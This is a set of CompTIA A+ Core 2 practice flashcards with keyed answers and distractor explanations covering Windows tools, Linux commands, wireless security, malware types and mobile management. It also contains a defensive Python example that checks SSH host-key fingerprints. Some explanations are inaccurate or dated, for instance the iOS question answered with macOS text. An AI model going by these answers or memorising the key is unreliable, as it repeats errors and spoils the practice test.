CompTIA A+ Core 2 Practice Test Flashcards

1
Q

An administrator uses a method that uses simultaneous authentication of equals (SAE) instead of the 4-way handshake. What is this method?

AES

MFA

TKIP

WPA3

A

WPA3

Wi-Fi Protected Access 3 (WPA3) uses passphrase-based group authentication of stations in private mode; it changes the method by which this secret is used to agree session keys. The simultaneous authentication of equals (SAE) protocol replaces the 4-way handshake.

Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.

Temporal key integrity protocol (TKIP) tries to mitigate the various attacks developed against WEP by producing a new 128-bit encryption key for every packet sent on the network.

Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard used by Wi-Fi.

2
Q

What type of malware attack designates the victim’s computer to mine digital currency?

Trojans

Spyware

Cryptominer

Viruses

A

Cryptominer

A cryptominer hijacks the resources of the host to perform cryptocurrency mining. Cryptomining is often performed across botnets, which is also referred to as cryptojacking.

Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and so on.

Viruses are concealed within the code of an executable process image stored as a file on a disk.

Trojans are malware concealed within an installer package for software that appears to be legitimate. The malware will be installed alongside the program and executed with the same privileges.

3
Q

A software company hires a new app developer. The corporate network denies access when the developer tries to connect their phone. Why would the network deny access from the developer’s mobile phone?

Sluggish response time

App spoofing

Developer mode

High network traffic

A

Developer mode

The developer’s phone is in developer mode. The company’s Mobile Device Management (MDM) system blocks access to the network because developer mode can be used to install bootleg apps.

High network traffic is a bandwidth utilization issue; it would not cause access to the network to be denied.

App spoofing is when a malicious app impersonates a legitimate app by using a similar name, fake reviews, and automated downloads to boost its apparent popularity.

Sluggish response time on a mobile device could be caused by malware, too many open apps, and a low battery charge, among other things. It would not cause the device to be denied network access.

4
Q

A client administrator for a video game development company wants to upgrade machines to support five primary partitions. The developers work with a lot of large files and might even need partitions larger than 2 TB. Which of the following should the administrator use?

APFS

MBR

GPT

NTFS

A

GPT

One of the features of GPT is support for more than four primary partitions. Windows allows up to 128 partitions with GPT. GPT also supports larger partitions (2 TB+) and a backup copy of the partition entries.

An OS must be installed to a partition formatted using a compatible file system. For Windows, this means using the New Technology File System (NTFS).

The master boot record (MBR) partition style stores a partition table in the first 512-byte sector on the disk.

Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).

5
Q

A technician uses filesystem-level encryption on some files that need to be encrypted on their device. What is this called?

EFS

Inheritance

Application security

Port security

A

EFS

The Encrypting File System (EFS) feature of the New Technology File System (NTFS) supports file and folder encryption. EFS is not available in the Home edition of Windows. The encryption key used by EFS is associated with the username and password.

Port security triggers are based on the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) port number used by the application protocol.

Application security triggers are based on the process that listens for connections.

Inheritance means that permissions assigned to a folder are automatically inherited by the files and subfolders created under that folder.

6
Q

A progressive healthcare provider sets up color-filter modes on client machines and tailors them to specific users who are color blind. Where can the healthcare administrator configure this?

Mail

Show hidden files

Accessibility

Windows Firewall

A

Accessibility

Ease of Access settings configure input and output options to best suit each user. There are three main settings groups. In Windows 11, they can be found under the Accessibility heading.

A file or folder can be marked as “Hidden” through its file attributes. Files marked as hidden are not shown by default but can be revealed by setting the “Show hidden files, folders, and drives” option.

Windows Defender Firewall determines which processes, protocols, and hosts can communicate with the local computer over the network.

In Accounts settings, Email & accounts is where sign-in credentials for other accounts, such as email or social networking, can be added, allowing quick access.

7
Q

An administrator uses a method that assigns permissions and rights to a collection of user accounts. What is this called?

ACL

MFA

Least privilege

Security group

A

Security group

A security group is a collection of user accounts, as it is more efficient to assign permissions to a group than to assign them individually to each user.

An access control list (ACL) is a list of access control entries (ACEs), each of which identifies a subject and its permissions for the resource. A subject could be a human user, a computer, or a software service.

Least privilege means that a user should be granted the minimum possible rights necessary to perform their job, which can be complex to apply in practice.

Multifactor authentication (MFA) means that the user must submit at least two different credentials.

8
Q

A security administrator is in charge of multiple locations in various countries. The administrator wants to set Coordinated Universal Time (UTC) on a test box to ensure logging is standardized. In Windows, where can the administrator set this?

Personalization

Time and Language

Internet Options

Privacy

A

Time and Language

The Time & Language settings page sets the correct date/time and time zone. Keeping the PC synchronized to an accurate time source is important for processes.

The Personalization settings allow users to select and customize themes, which set the appearance of the desktop environment.

Privacy settings govern what usage data Windows is permitted to collect, what device functions are enabled, and for which apps.

The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab restricts what types of potentially risky active content are allowed to run.

9
Q

A vulnerability manager investigates their mobile environment for overall risk posture and starts with identifying legacy systems. Who determines when an Android version is at the end of life?

Microsoft

Google

Apple

Vendor

A

Vendor

End-of-life policies and update restrictions for particular handsets are determined by the handset vendor rather than the overall Android authority.

Android is a smartphone/tablet OS developed by the Open Handset Alliance, primarily driven by Google. However, handset vendors can produce their own versions as well.

Microsoft has its own cell phone, which runs an OS designed to work with a handheld portable device. This type of OS must have a touch-operated interface.

iOS is the operating system for Apple’s iPhone smartphone and original models of the iPad tablet. Like macOS, iOS is also derived from UNIX.

10
Q

A threat actor uses a technique that inserts statements through unfiltered user input. What is this technique?

SQL injection

Brute force attack

XSS

Dictionary attack

A

SQL injection

A SQL injection attack is when the attacker modifies one or more of the app’s basic functions by adding code to some input accepted by the app, causing it to execute the attacker’s own set of SQL queries or parameters.

A cross-site scripting (XSS) attack exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit.

A dictionary attack is when the software matches the hash to those produced by ordinary words found in a dictionary.

A brute force attack is when the software tries to match the hash against every possible combination it could be.

11
Q

An employee disposes of a disk by grinding it into little pieces. What is this called?

Erasing/wiping

Degaussing

Shredding

Incinerating

A

Shredding

Shredding is when a disk is put into a mechanical shredder to be destroyed. A mechanical shredder works in much the same way as a paper shredder.

Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.

Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.

Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.

12
Q

A security engineer researches how to make backup and antivirus apps available to their iOS mobile devices. Where should the apps be pushed?

Business Manager

Security & Privacy

iCloud

Finder

A

Business Manager

A supervised macOS can be restricted in terms of app installation and uninstallation policies. Corporate apps can be pushed to devices via the Business Manager portal.

By default, macOS will only allow apps to be installed if downloaded from the Mac App Store. To allow the installation of downloaded apps, go to System Preferences > Security & Privacy.

The Finder is the macOS equivalent of File Explorer in Windows. It lets the user navigate all the files and folders on a Mac.

iCloud is Apple’s online storage solution for its users. It provides a central, shared location for mail, contacts, calendar, photos, notes, reminders, and more across macOS and iOS devices.

13
Q

A Linux server administrator notices a service they do not recognize, although the environment is quite big. They look at the help file for the ksh process, but the documentation seems poor. It does seem to indicate that it provides interactivity, however. What type of program is this?

Backup

Antivirus

Terminal

Updates

A

Terminal

The shell provides a command environment by which a user can operate the OS and applications. Many shell programs are available with Linux, notably Bash, zsh, and ksh (Korn shell).

Products such as Clam AntiVirus (ClamAV) and the Snort Intrusion Prevention System (IPS) can be used to block varied malware threats and attempts to counteract security systems.

apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.

Linux does not have an “official” backup tool. There are plenty of commercial and open-source backup products for Linux, however. Some examples include Amanda, Bacula, Fwbackups, and Rsync.

14
Q

A spouse plans a surprise birthday party for their significant other. The spouse wants to turn off activity history on their browser to make sure their significant other does not find out the surprise. Where can the spouse do this?

Update and security

Internet Options

Privacy

Personalization

A

Privacy

Privacy settings govern what usage data Windows is permitted to collect, what device functions are enabled, and for which apps.

The Update & Security settings provide a single interface to manage a secure and reliable computing environment.

The Personalization settings allow the users to select and customize themes, which set the appearance of the desktop environment.

The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab is used to restrict what types of potentially risky active content are allowed to run.

15
Q

A Windows administrator wants to learn how to use Linux by installing the Linux subsystem for Windows. What should their version of Windows have on the New Technology File System (NTFS) to support case-sensitive naming and hard links required by Linux?

POSIX

Journaling

32-bit allocation table

Indexing

A

POSIX

To support UNIX/Linux compatibility, Microsoft engineered NTFS to support case-sensitive naming, hard links, and other key features UNIX/Linux applications require. This is known as POSIX compliance.

When data is written to an NTFS volume, it is re-read, verified, and logged via journaling. In the event of a problem, the sector concerned is marked as bad and the data relocated.

FAT32 is a variant of FAT that uses a 32-bit allocation table, nominally supporting volumes up to 2 TB. The maximum file size is 4 GB minus 1 byte.

The Indexing Service creates a catalog of file and folder locations and properties, speeding up searches.

16
Q

A server administrator sets up jobs that will copy over files on various servers. They want it to detect if the file was transferred successfully and, if not, resend the file. Which command is optimal for server administrators to perform this task?

move

robocopy

xcopy

copy

A

robocopy

The robocopy command (or “robust copy”) is another file copy utility. Microsoft now recommends using robocopy rather than xcopy. Robocopy is designed to work better with long file names and NTFS attributes.

The xcopy command is a utility that allows users to copy the contents of more than one directory at a time and retain the directory structure.

The move command provides the ability to transfer files contained in a single directory. It uses a three-part syntax: command Source Destination, where Source is the drive name, path, and name of the files to be moved/copied.

The copy command also allows transferring files contained in a single directory.

17
Q

A penetration tester conducts the initial reconnaissance phase and is currently targeting externally facing servers for a certain company. Currently, they are trying to enumerate the domain name system (DNS) servers. Which built-in tool will help them perform this?

nano

find

cat

dig

A

dig

dig is a powerful tool for gathering information and testing name resolution, installed on most Linux distributions. Output is displayed in an answer section and includes the IP address mapped to the domain name.

The find command is used to search for files. Its basic syntax is find path expression.

cat returns the contents of the files listed as arguments. The -n switch adds line numbers to the output. Often, cat output is piped to a pager (cat | more or cat | less) to control scrolling.

There are numerous text file editors. The Nano text editor is a basic example often preferred by those from a Windows environment.

18
Q

A customer has opened a ticket for a problem to be fixed. When the customer opens the ticket, what should the record show?

Follow up statement

Distractions

Proper documentation

Clarify customer statements

A

Proper documentation

Proper documentation should be provided so that the customer knows what to expect in terms of supported items, how long incidents may take to resolve, and when they can expect an item to be replaced instead of repaired.

Clarifying customer statements means asking how the customer expects the work to proceed, when it will be done, and what their concerns are about the costs and the impact of the work.

Following up with a customer means providing general feedback on what caused the issue, how it was fixed, and assurance that the issue is now fixed and unlikely to recur.

A distraction is anything that interrupts an employee from the task of resolving the ticket.

19
Q

What checks the domain names of components loading on a web page against a vast blacklist?

Browser sign-in

Private browsing mode

Ad blocker

Clearing browsing data

A

Ad blocker

Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality.

Clearing browsing data options are used to delete browsing history. The user can have the browser do this automatically or do it manually.

Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

20
Q

A technician configures a method to run a server application on the local network and make it accessible from the internet. What is this method?

DHCP reservation

Port forwarding

Disabling unused ports

UPnP

A

Port forwarding

Port forwarding means that the router takes a request from an internet host for a particular service and sends the request to a designated host on the LAN.

The Dynamic Host Configuration Protocol (DHCP) reservation means that the DHCP server always assigns the same IP address to the host. A user can usually choose which IP address this should be.

Disabling unused ports ensures that only the enabled services are accessible. If a service is unused, it should not be accessible. If a port-forwarding rule is no longer required, it should be disabled or deleted completely.

The universal plug-and-play (UPnP) framework sends instructions to the firewall with the correct configuration parameters to allow applications to work.

21
Q

A customer uses their computer at a café, and an attacker watches the customer typing their login information. What is this called?

Shoulder surfing

Phishing

Vishing

Tailgating

A

Shoulder surfing

Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.

Tailgating is entering a secure area without authorization by following closely behind a person allowed to open the door or checkpoint.

Phishing uses social engineering techniques to make spoofed electronic communications seem authentic to the victim. A phishing message might convince the user to perform actions, such as installing malware disguised as an antivirus program.

Vishing is an attack through a voice channel like a telephone. It can be much more difficult for someone to refuse a request made in a phone call than one made in an email.

22
Q

An IT technician is installing software on a device that inspects network traffic and accepts or blocks traffic based on a set of rules. What is this called?

PIN

Firewall

Swipe

Pattern

A

Firewall

Firewalls perform the role of filtering allowed and denied hosts and protocols. A basic firewall is configured with rules, referred to as a network access control list (ACL).

Swipe is a gesture that means that access to the device is unauthenticated. Simply swiping across the screen will unlock the device.

Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.

Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.

23
Q

After starting the computer and signing in, a user notices the desktop takes a long time to load. Evaluate the following Windows operating system problems to determine the one that best diagnoses what could be causing the slowness.

Corrupted registry

Invalid boot disk

Corrupted user profile

Time drift

A

Corrupted user profile

When a computer starts normally and a user logs in normally but the desktop is slow to load, a corrupted user profile is the likely culprit.

Time drift occurs when the time on the motherboard and the server gets out of sync. Using GPS-synchronized time sources or a pool of internet sources will address time drift.

A corrupted registry likely would prevent the computer from booting, or it would boot to a blue screen of death (BSOD).

An invalid boot disk means the system has failed to boot, which is not true in this scenario.

24
Q

An IT manager, who is in charge of the client image, considers enabling a data at rest solution. Where can the manager go to enable the built-in Microsoft solution?

Network and Sharing

Programs and Features

System Settings

Devices and Printers

A

System Settings

The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying). BitLocker disk encryption is here.

The Devices and Printers applet in the Control Panel provides an interface for adding devices manually and shortcuts to the configuration pages for connected devices.

The Programs and Features Control Panel applet is the legacy software management interface. Users can use it to install and modify desktop applications and Windows Features.

Network and Sharing Center is a Control Panel applet that shows status information.

25
Q

What uses a 4-way handshake to allow a station to associate with an access point, authenticate its credential, and exchange a key to use for data encryption?

TKIP

WPA3

WPA2

MFA

A

WPA2

Wi-Fi Protected Access 2 (WPA2) was designed to fix critical vulnerabilities in the earlier WEP standard. WPA2 uses the AES cipher deployed within the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP).

Temporal key integrity protocol (TKIP) tries to mitigate the various attacks developed against WEP by producing a new 128-bit encryption key for every packet sent on the network.

Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.

Wi-Fi Protected Access 3 (WPA3) uses passphrase-based group authentication of stations in private mode; it changes the method by which this secret is used to agree session keys.

26
Q

A technician implements an authentication method used on Windows machines in which, once users are authenticated, they are trusted by the system. What is this method?

Kerberos

RADIUS

TACACS+

TKIP

A

Kerberos

Kerberos allows a user account to authenticate to a domain controller (DC) over a trusted local cabled segment. Kerberos facilitates single sign-on (SSO).

Terminal access controller access control system plus (TACACS+) is another way of implementing AAA. TACACS+ is often used in authenticating administrative access to routers, switches, and access points.

Remote Authentication Dial-In User Service (RADIUS) is used to implement the AAA server when configuring enterprise authentication. Rather than the access point storing and validating user credentials directly, it forwards data between the RADIUS server and the supplicant without reading it.

Temporal key integrity protocol (TKIP) tries to mitigate the various attacks developed against WEP by producing a new 128-bit encryption key for every packet sent on the network.

27
Q

What ensures that old data is destroyed by writing to each location on a hard disk drive?

Erasing/wiping

Incinerating

Standard formatting

Low-level formatting

A

Erasing/wiping

Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner. This overwriting method is suitable for all but the most confidential data.

The standard formatting tool deletes partitions and writes a new file system; this only removes references to files and marks all sectors as usable.

A low-level formatting tool resets a disk to its factory condition. Most of these tools will now incorporate some sanitize function.

Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.

28
Q

Which of the following log-in options requires a user to touch a device that takes a digital print?

Facial recognition

OU

Fingerprint scanner

Security key

A

Fingerprint scanner

A fingerprint is a type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.

Facial recognition is the bio gesture that uses a webcam to scan the unique features of the user’s face. The camera records a 3-D image using its infrared (IR) sensor to mitigate attempts to use a photo to spoof the authentication mechanism.

Security key sign-in uses a removable USB token or smart card. It can also use a trusted smartphone with a near-field communication (NFC) sensor.

An organizational unit (OU) is a way of dividing a domain up into different administrative realms. OUs might be created to delegate responsibilities for administering company departments or locations.

29
Q

The Instagram app on an Android phone will not launch. Which of the following options could fix the problem?

Software Update

Force Stop

AirDrop

Swiping

A

Force Stop

If an app fails to launch, first use Force Stop to quit it and try launching again. In Android, open Settings > Apps. Tap an app, then select Force Stop. In iOS, either swipe up or double-tap the physical Home button, then swipe the app up off the screen.

Swiping is a mobile gesture that serves several purposes, such as bringing up the notification bar in Android (swipe down from the top of the screen) and bringing up a list of apps in iOS (swipe up from the bottom).

AirDrop is an iOS feature that allows file transfer between iOS and macOS devices over Bluetooth.

Software Update is an iOS option. The comparable Android option is a System Update.

30
Q

A company uses a credit card transaction standard that guarantees both the customer’s card data and the company’s system are safe against fraudulent purchases and identity theft. What is this?

PCI DSS

Chain of custody

IRP

Open-source license

A

PCI DSS

Payment card industry data security standard (PCI DSS) regulations protect credit card transactions from fraud. Some regulations have specific cybersecurity control requirements; others mandate “best practices,” as represented by a particular industry or international framework.

An open-source license makes software free to use, modify, and share, and makes the program code used to design it available.

An incident response plan (IRP) sets out procedures and guidelines for dealing with security incidents.

A chain of custody form records who collected the evidence, who has handled it subsequently, and where they stored it, and must account for access to the evidence at every point.

31
Q

A security administrator for Linux systems in their demilitarized zone wants to ensure only some administrators can perform certain commands. Which of the following is best used to lock down certain commands?

chown

sudo

chmod

rm

A

sudo

The sudo (superuser do) command allows any user account listed in the /etc/sudoers file to run specified commands with superuser privilege level.

The chmod command can be used to secure files and directories, using either symbolic or octal notation. Only the owner can change permissions.

The chown command allows the superuser to change the owner of a file or directory. Note that this right is reserved to the superuser or a sudoer.

The rm command can be used to delete files. It can also be used with the -r option to delete directories.

32
Q

What will block third-party cookies and enable strict tracking protection?

Private browsing mode

Ad blockers

Clearing cache

Pop-up blockers

A

Private browsing mode

Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.

Clearing cache is used to delete browsing history. Browsers will maintain a history of pages visited, cache files to speed up browsing, and save text typed into form fields.

Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality.

Pop-up blockers prevent a website from creating dialogs or additional windows. The pop-up technique was used to show fake advertisements and security warnings.

33
Q

What type of employee device must meet the profile that the company requires, with the employee agreeing to the installation of corporate apps and to some level of oversight and auditing?

COBO

BYOD

COPE

CYOD

A

BYOD

Bring your own device (BYOD) is a mobile device owned by the employee. This model is usually the most popular with employees but poses the most difficulties for security and network managers.

A corporate-owned business only (COBO) device is the company’s property and may only be used for company business.

Corporate-owned, personally enabled (COPE) is when the company chooses and supplies the device, and the device remains the company’s property. The employee may use it to access personal email, social media accounts, and personal web browsing.

Choose your own device (CYOD) is like COPE, but the employee can choose the device they want from a list.

34
Q

A company has employees sign a document that enforces the importance of protecting the organization from the security and legal implications of employees misusing its equipment. What is this document?

Assigned users

Splash screen

Acceptable use policy

Procurement life cycle

A

Acceptable use policy

Acceptable use policy (AUP) sets out what someone can use a particular service or resource for.

The procurement life cycle covers the request and approval procedure, budgeting, identifying a trusted supplier or vendor for the asset, deploying the asset in a secure configuration, maintenance, and finally disposal.

Assigned users refers to hardware assets such as workstations, laptops, smartphones, tablets, and software licenses being assigned to individual user accounts in the asset inventory.

The splash screen is a graphic design element that consists of a window containing an image, logo, and the current version of the software.

35
Q

The operating system update on a user’s phone fails. The user verifies that the phone is plugged into a wall outlet and connected to the office Wi-Fi. Which of the following could be responsible for the update failure?

NFC

WLAN

RADIUS

Metered network

A

Metered network

Updates may be blocked if a device is connected to a metered network. Additionally, if the operating system update is incompatible with the device model, it may cause the update to fail.

Remote Authentication Dial-in User Service (RADIUS) is a protocol used to manage remote and wireless authentication infrastructures.

Near-field communication (NFC) is mostly used for contactless payment readers, security ID tags, and shop shelf-edge labels for stock control.

A wireless local area network (WLAN) uses radios and antennas for data transmission and reception. Most WLANs are based on the IEEE 802.11 series of standards, better known as Wi-Fi. Since the user verified that the phone was connected to Wi-Fi, WLAN would not be an issue.

36
Q

A technician must remove all corporate accounts and files from an employee’s device but leave personal applications, accounts, settings, and files untouched. What is this called?

Enterprise wipe

Remote wipe

Profile security requirements

Locator application

A

Enterprise wipe

An enterprise wipe removes only the corporate container (corporate accounts, apps, and data) and leaves personal data in place. The device must be enrolled in mobile device management (MDM).

Remote wipe erases all data on the device remotely if it is stolen or lost; unlike an enterprise wipe, it does not distinguish corporate from personal data.

Profile security requirements document the details of the secure implementation of a device. These policies are applied to different employees and different sites or areas within the site.

A locator application finds a device if it is lost or stolen. Once set up, the phone’s location can be tracked from any web browser when it is powered on.

37
Q

A server administrator receives a report that the company’s external-facing web server is unresponsive. Rebooting the server would take too long, and they are not even completely certain the server would come back up. What utility should the administrator use to restart the website?

msconfig.exe

services.msc

regedit.exe

certmgr.msc

A

services.msc

The Services console (services.msc) starts, stops, pauses, and restarts the services that run in the background, so the administrator can restart the web server’s service (for example, the World Wide Web Publishing Service on an IIS host) without rebooting the machine. Of the options listed, regedit.exe would be used to make configuration changes, not to restart a service.

The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect how the computer boots and loads Windows.

The Certificate Manager (certmgr.msc) console shows which certificates have been installed and provides a mechanism for requesting and importing new certificates.

The Windows registry is a database storing operating system, device, and software application configuration information; it can also be accessed remotely when the Remote Registry service is running. The administrator can use the Registry Editor (regedit.exe) to view or edit the registry, but that does not restart a service.

38
Q

A user downloads a dating app from the Apple store and then gets requests for permission to access their camera; which of the following is the most likely cause of the permission requests?

Sideloaded app

Spoofed app

Locator app

Enterprise app

A

Spoofed app

A spoofed app is a malicious app that imitates a legitimate one, using a similar name, fake reviews, and automated downloads to boost its apparent popularity. Once installed, it acts as spyware and may request permissions unrelated to its function, such as camera access for a dating app.

Sideloading is downloading apps from a source other than a trusted store. In this scenario, the app was downloaded from the trusted Apple store.

An enterprise app is a custom corporate app.

A locator app is a cloud app that uses a mobile-device location service to identify its current position on a map and enable security features to mitigate theft or loss.

39
Q

An administrator assists the human resources department in testing access to their new cloud-based training site. Unfortunately, the site cannot be accessed due to the organizational security policy. Which of the following should the administrator use to assist them?

diskmgmt.msc

taskschd.msc

certmgr.msc

lusrmgr.msc

A

certmgr.msc

The Certificate Manager (certmgr.msc) console shows which certificates have been installed and provides a mechanism for requesting and importing new certificates. In this scenario, the likely cause of the block is that the training site’s certificate, or the CA that issued it, is not trusted under the organization’s policy, so the administrator would use certmgr.msc to check the installed certificates and import the required one.

The Disk Management (diskmgmt.msc) console displays a summary of any fixed and removable disks, which includes hard disk drives (HDDs), solid-state drives (SSDs), and optical drives.

The Task Scheduler (taskschd.msc) runs software and scripts according to calendar or event triggers which would not help diagnose and troubleshoot internet connectivity issues.

The Local Users and Groups (lusrmgr.msc) console provides an advanced interface for creating, modifying, disabling, and deleting user accounts.

40
Q

An attacker can access a computer by executing a lunchtime attack. Which of the following principles were NOT followed that led to this attack?

Secure/protect critical hardware.

Log off when not using the computer.

Disable guest accounts.

Secure PII and passwords.

A

Log off when not using the computer.

Logging off (or locking the screen) whenever leaving a computer unattended is a habit users must develop; a lunchtime attack is exactly the abuse of an unattended, still logged-in session. Policies can also configure a screensaver that locks the desktop after a period of inactivity.

Securing personally identifiable information (PII) and passwords means that paper copies of personal and confidential data must not be left where they could be read or stolen.

Securing and protecting critical hardware means users must be alert to the risk of physical theft of devices.

Guest accounts allow unauthorized access to the computer and may provide some network access too, so they should be disabled. The guest account is only enabled to facilitate password-less file sharing in a Windows workgroup.

41
Q

While browsing the internet, a user receives a pop-up that states, “We have detected a Trojan virus. Click OK to begin the repair process.” Out of fright, the user clicks OK. Given the following choices, what is the most likely outcome of the user’s response?

Unwanted notifications start popping up in Windows.

Nothing happens because Windows BitLocker blocks the Trojan virus.

User starts experiencing drive-by downloads.

UAC will need to be enabled.

A

Unwanted notifications start popping up in Windows.

Malware often targets the browser, so clicking on a website pop-up is likely to deliver some type of infection, such as adware, which will deliver unwanted notifications.

A drive-by download will infect a computer with malware because a user visited a malicious site. However, in this scenario, the user was not passive. They actively interacted with the pop-up to install the adware.

BitLocker is an encryption tool, not an antivirus tool.

User Account Control (UAC) prevents the unauthorized use of administrative privileges. It is enabled by default, though it can be disabled, so it would not need to be enabled as a result of clicking the pop-up.

42
Q

Which of the following extensions combines a scripting language with hundreds of prebuilt modules called cmdlets that can access and change most components and features of Windows and Active Directory components and features?

.js

.py

.ps1

.sh

A

.ps1

.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.

.sh is the Linux shell script extension by convention. A shell script starts with a shebang line that designates which interpreter to use, such as Bash or ksh.

.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Every browser includes a JavaScript interpreter, and JavaScript also runs server-side in runtimes such as Node.js.

.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.

43
Q

A technician uses a method where each server is configured with a public/private encryption key pair and identified by a host key fingerprint. What is this method?

SSH

RDP

VNC

VPN

A

SSH

Secure shell (SSH) is also a remote access protocol, but it connects to a command interpreter rather than a desktop window manager. Each SSH server has a public/private host key pair; the client identifies the server by the host key’s fingerprint, records it on first connection, and warns if a later connection presents a different key, which can indicate a man-in-the-middle attack.

Remote desktop protocol (RDP) implements terminal server and client functionality. RDP authentication and session data are always encrypted.

A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. A typical pattern is to establish the VPN link and then use remote desktop to connect to a host on the private network.

Virtual network computing (VNC) is a freeware product similar to RDP. It works over TCP port 5900. Not all versions of VNC support connection security.
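The host key fingerprint check described above, as an added worked example in Python that is not part of the original flashcard: it builds a public key line in the shape of an OpenSSH `.pub` file from constructed (fake) key bytes, computes the same `SHA256:` fingerprint that `ssh-keygen -lf` prints, and compares a server's presented key with a pinned fingerprint, refusing both unknown hosts and changed keys. The host names and key bytes are made up for the example.

```python
import base64
import hashlib
import hmac
import struct
from typing import Dict, Tuple

# Constructed sample key material: 32 arbitrary bytes standing in for an
# Ed25519 public key. This is NOT a real key, and the host names are made up.
_SAMPLE_KEY_BYTES = bytes(range(32))
_OTHER_KEY_BYTES = bytes(range(1, 33))


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def build_public_key_line(key_type: str, key_bytes: bytes, comment: str) -> str:
    """Build a line in the shape of an OpenSSH *.pub file: '<type> <base64 blob> <comment>'."""
    blob = _ssh_string(key_type.encode()) + _ssh_string(key_bytes)
    return f"{key_type} {base64.b64encode(blob).decode()} {comment}"


def parse_public_key_line(line: str) -> Tuple[str, bytes]:
    """Return (key_type, raw blob), refusing lines whose declared type
    disagrees with the type string embedded at the start of the blob."""
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("malformed public key line")
    key_type = fields[0]
    blob = base64.b64decode(fields[1], validate=True)
    (type_len,) = struct.unpack_from(">I", blob, 0)
    embedded_type = blob[4:4 + type_len].decode()
    if embedded_type != key_type:
        raise ValueError(f"declared type {key_type!r} != embedded type {embedded_type!r}")
    return key_type, blob


def is_well_formed(line: str) -> bool:
    try:
        parse_public_key_line(line)
        return True
    except (ValueError, struct.error, UnicodeDecodeError):
        return False


def sha256_fingerprint(line: str) -> str:
    """OpenSSH-style fingerprint: 'SHA256:' + unpadded base64 of SHA-256(blob),
    the same value `ssh-keygen -lf host_key.pub` prints."""
    _, blob = parse_public_key_line(line)
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def verify_host_key(host: str, presented_line: str, pinned: Dict[str, str]) -> str:
    """Compare a server's presented key against the fingerprint pinned for that host.
    Returns 'ok', 'unknown-host' (no pin: do not silently trust on first use), or
    'MISMATCH' (key changed: possible man-in-the-middle, refuse to connect)."""
    expected = pinned.get(host)
    if expected is None:
        return "unknown-host"
    actual = sha256_fingerprint(presented_line)
    if hmac.compare_digest(actual.encode(), expected.encode()):
        return "ok"
    return "MISMATCH"


# Constructed sample data: the key a server showed on first contact (recorded as a
# pin), and a different key later presented under the same host name.
SERVER_KEY_LINE = build_public_key_line("ssh-ed25519", _SAMPLE_KEY_BYTES, "root@srv01")
ROGUE_KEY_LINE = build_public_key_line("ssh-ed25519", _OTHER_KEY_BYTES, "root@srv01")
PINNED = {"srv01.example.internal": sha256_fingerprint(SERVER_KEY_LINE)}

if __name__ == "__main__":
    print("pinned:", PINNED)
    print("same key:", verify_host_key("srv01.example.internal", SERVER_KEY_LINE, PINNED))
    print("changed key:", verify_host_key("srv01.example.internal", ROGUE_KEY_LINE, PINNED))
    print("no pin:", verify_host_key("srv02.example.internal", SERVER_KEY_LINE, PINNED))
```

In practice the pinned values come from the client's known_hosts file or from an out-of-band source such as the server's console; the point of the MISMATCH branch is that a changed host key must stop the connection rather than prompt the user to accept the new key.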

44
Q

Which of the following uses a security shield icon for tasks that are protected under them?

Fingerprint

SSO

PIN

UAC

A

UAC

User account control (UAC) is a Windows security feature designed to protect the system against malicious scripts and attacks that could exploit the powerful privileges assigned to members of the Administrators group.

A personal identification number (PIN) is a passcode used to authenticate a user to a system; a Windows Hello PIN can also contain letters and symbols.

A fingerprint is a biometric authentication method that uses a sensor to scan the unique features of the user’s fingerprint.

Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services.

45
Q

A teenager hears from friends about a legitimate website to download games to their Samsung Galaxy phone that is not in the Google Play store. The teenager goes to the site and downloads some games. What best describes the teenager’s behavior?

APK sideloading

Bootlegging

Jailbreaking

Rooting

A

APK sideloading

APK (Android Package) is the file format for Android apps. APK sideloading refers to downloading apps from a source other than Google’s Play store.

